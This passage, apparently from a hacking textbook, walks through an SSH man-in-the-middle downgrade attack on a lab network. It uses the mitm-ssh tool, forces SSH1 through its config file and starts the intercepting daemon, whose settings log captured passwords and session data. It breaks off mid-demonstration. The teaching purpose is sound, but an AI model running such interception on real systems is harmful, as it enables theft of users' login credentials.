412 0x700
be asked to add the new fingerprint. The mitm-sshtool uses a configuration
file similar to openssh’s, since it’s built from that code. By adding the line
Protocol 1 to /usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will
claim it only speaks the SSH1 protocol.
The output below shows that loki’s SSH server usually speaks using both
SSH1 and SSH2 protocols, but when mitm-ssh is put in the middle using the
new configuration file, the fake server claims it only speaks SSH1 protocol.From 192.168.42.250 (tetsuo), Just an Innocent Machine on the Network
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9p1
Connection closed by foreign host.
iz@tetsuo:~ $ rm ~/.ssh/known_hosts
iz@tetsuo:~ $ ssh [email protected]
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
[email protected]'s password:
iz@tetsuo:~ $
On the Attacker’s Machine, Setting Up mitm-ssh to Only Use SSH1 Protocol
reader@hacking:~ $ echo "Protocol 1" >> /usr/local/etc/mitm-ssh_config
reader@hacking:~ $ tail /usr/local/etc/mitm-ssh_config
# Where to store passwords
#PasswdLogFile /var/log/mitm-ssh/passwd.log# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-sshProtocol 1
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.Now Back on 192.168.42.250 (tetsuo)
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.